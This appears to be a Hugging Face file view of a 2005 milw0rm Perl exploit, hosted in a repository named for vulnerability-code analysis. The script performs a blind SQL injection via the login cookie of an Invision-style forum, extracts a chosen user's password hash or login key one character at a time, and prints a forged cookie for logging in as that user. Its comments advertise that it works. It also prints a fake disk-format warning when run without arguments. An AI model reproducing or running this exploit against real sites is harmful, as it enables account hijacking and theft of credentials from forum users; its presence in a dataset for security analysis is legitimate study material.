Hugging Face's logo

lilbool
/
vuln-code-analysis

Model card Files
xet
Community
vuln-code-analysis
File size: 2,373 Bytes
497f2f3
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
 
#!/usr/bin/perl -w

##################################################################

# This one actually works :) Just paste the outputted cookie into

# your request header using livehttpheaders or something and you

# will probably be logged in as that user. No need to decrypt it!

# Exploit coded by "Tony Little Lately" and "Petey Beege"

##################################################################



use LWP::UserAgent;



   $ua = new LWP::UserAgent;

   $ua->agent("Mosiac 1.0" . $ua->agent);



if (!$ARGV[0]) {$ARGV[0] = '';}

if (!$ARGV[3]) {$ARGV[3] = '';}



my $path = $ARGV[0] . '/index.php?act=Login&CODE=autologin';

my $user = $ARGV[1];   # userid to jack

my $iver = $ARGV[2];   # version 1 or 2

my $cpre = $ARGV[3];   # cookie prefix

my $dbug = $ARGV[4];   # debug?



if (!$ARGV[2])

{

        print "The type of the file system is NTFS.\n\n";

        print "WARNING, ALL DATA ON NON-REMOVABLE DISK\n";

        print "DRIVE C: WILL BE LOST!\n";

        print "Proceed with Format (Y/N)?\n";

        exit;

}



my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");



my $outputs = '';



for( $i=1; $i < 33; $i++ )

{

        for( $j=0; $j < 16; $j++ )

        {

                my $current = $charset[$j];

            my $sql = ( $iver < 2 ) ?  "99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d%2527$current%2527)/*" :

"99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i,1)%3d%2527$current%2527)/*";

                my @cookie = ('Cookie' => $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql);

                my $res = $ua->get($path, @cookie);



                # If we get a valid sql request then this

                # does not appear anywhere in the sources

                $pattern = '<title>(.*)Log In(.*)</title>';



                $_ = $res->content;



                if ($dbug) { print };



                if ( !(/$pattern/) )

                {

                        $outputs .= $current;

                        print "$current\n";

                    last;

                }



        }

  if ( length($outputs) < 1 )   { print "Not Exploitable!\n"; exit;     }

}

print "Cookie: " . $cpre . "member_id=" . $user . ";" . $cpre . "pass_hash=" . $outputs;

exit;



# milw0rm.com [2005-05-26]